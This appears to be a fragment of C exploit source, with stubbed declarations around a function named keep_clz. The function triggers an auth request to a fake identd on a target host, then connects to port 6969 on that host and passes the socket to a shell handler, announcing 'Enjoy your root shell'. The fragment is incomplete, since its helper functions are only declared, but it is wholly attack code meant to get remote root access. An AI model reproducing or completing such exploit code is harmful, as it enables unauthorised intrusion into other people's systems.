
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int MY_PORT ;
 int THEIR_PORT ;
 int close (int) ;
 scalar_t__* host ;
 int printf (char*) ;
 int shellami (int) ;
 int sleep (int) ;
 int sockami2 (scalar_t__*,int,int) ;

void
keep_clz(void)
{
  int sock;

  if(host[0] != 0)
 {
   printf("+Causing an auth request to our fake_identd\n");
     sock = sockami2(host, MY_PORT, THEIR_PORT);
     printf("  done\n");
     close(sock);

   printf("+Enjoy your root shell...\n  0x69 =)\n");
   sleep(1);
   sock = sockami2(host, 6969, 30464);
   shellami(sock);
 }
}
